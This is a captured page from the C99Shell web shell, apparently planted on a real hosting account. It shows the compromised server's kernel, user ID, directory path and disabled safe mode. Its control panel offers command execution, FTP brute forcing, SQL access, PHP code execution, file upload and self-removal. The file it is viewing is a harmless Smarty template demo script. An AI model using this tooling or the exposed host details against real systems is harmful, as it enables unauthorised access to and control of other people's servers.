!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.22 (Debian). PHP/5.6.36 

uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64 

uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure) 

Safe-mode: OFF (not secure)

/home/h33678/data/www/zt-tsou.org.ua/modules-alien/smarty/demo/   drwxr-xr-x
Free 107.44 GB of 200.55 GB (53.57%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     index_php_template.php (1.02 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
* Test script for PHP template
* @author Monte Ohrt <monte at ohrt dot com> 
* @package SmartyTestScripts
*/
require('../libs/Smarty.class.php');

 class 
Person
{
    private 
$m_szName;
    private 
$m_iAge;
    
    public function 
setName($szName)
    {
        
$this->m_szName $szName;
        return 
$this// We now return $this (the Person)
    
}
    
    public function 
setAge($iAge)
    {
        
$this->m_iAge $iAge;
        return 
$this// Again, return our Person
    
}
    
    public function 
introduce()
    {
          return  
'Hello my name is '.$this->m_szName.' and I am '.$this->m_iAge.' years old.';
    }
}  

$smarty = new Smarty();
$smarty->allow_php_templatestrue;
$smarty->force_compile false;
$smarty->caching true;
$smarty->cache_lifetime 100;
//$smarty->debugging = true;

$smarty->assign('foo',"'bar'");

$person = new Person;

$smarty->assign('person',$person);

$smarty->assign('array',array('a'=>array('aa'=>'This is a long string'),'b'=>2));

$smarty->display('php:index_view.php');

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by PinoyWH1Z | C99Shell Github | Generation time: 0.0113 ]--